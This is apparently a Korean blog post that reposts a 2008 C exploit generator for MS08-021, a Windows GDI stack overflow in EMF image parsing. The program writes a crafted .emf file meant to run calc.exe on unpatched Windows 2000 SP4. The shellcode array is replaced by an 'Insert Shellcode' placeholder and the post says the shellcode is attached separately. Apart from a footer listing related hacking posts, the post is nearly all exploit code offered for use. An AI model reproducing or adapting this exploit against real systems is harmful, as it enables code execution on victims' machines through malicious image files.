4월 14일 공개된 MS GDI Image Parsing 관련 Exploit Code.
Shellcode 는 넘 커서 파일첨부로 따로 ;;
shellcode-vrc949k.txt
MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)
/////////////////////////////////////////////////////////////
///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
/// automatically run calc.exe in Win2kSP4 CHS Version
/// with MS07-046 patched but no MS08-021 is installed.
/// In Windows XP SP2, explorer.exe will crashed but
/// calc will not be run.
/////////////////////////////////////////////////////////////
#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
unsigned char data[130168] = {
Insert Shellcode
};
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
int _tmain(int argc, _TCHAR* argv[])
{
printf("/////////////////////////////////////////////////////////////\n\
///Exploit the MS08-021 : Stack Overflow on GDI API\n\
///Author: Lamhtz\n\
///Date: April 14th, 2008\n\
///Usage: <appname.exe> [filename]\n\
///Your filename must end with .emf\n\
/////////////////////////////////////////////////////////\n");
if (argc != 2)
{
printf("Usage: <appname.exe> [filename]\n");
exit(0);
}
FILE *stream;
if( fopen_s( &stream, argv[1], "w+b" ) == 0 )
{
printf("Generating %s....\n", argv[1]);
fwrite( data, sizeof(data) ,1 , stream );
printf( "%s created ! \n", argv[1] );
fclose( stream );
}
else
{
printf("File Created Failure ! \n");
exit(-1);
}
return 0;
}
'개발 > 해킹' 카테고리의 다른 글
| Apache Killer" a DDoS using the Range HTTP Header (0) | 2012.02.05 |
|---|---|
| JSUNPACK (0) | 2012.02.05 |
| XSS 공격 및 방어 가이드 (6) | 2012.02.05 |
| ARP Spoofing 기법을 이용한 악성코드 (0) | 2012.02.05 |
| DNS 싱크홀 적용 안내서 (0) | 2012.02.05 |
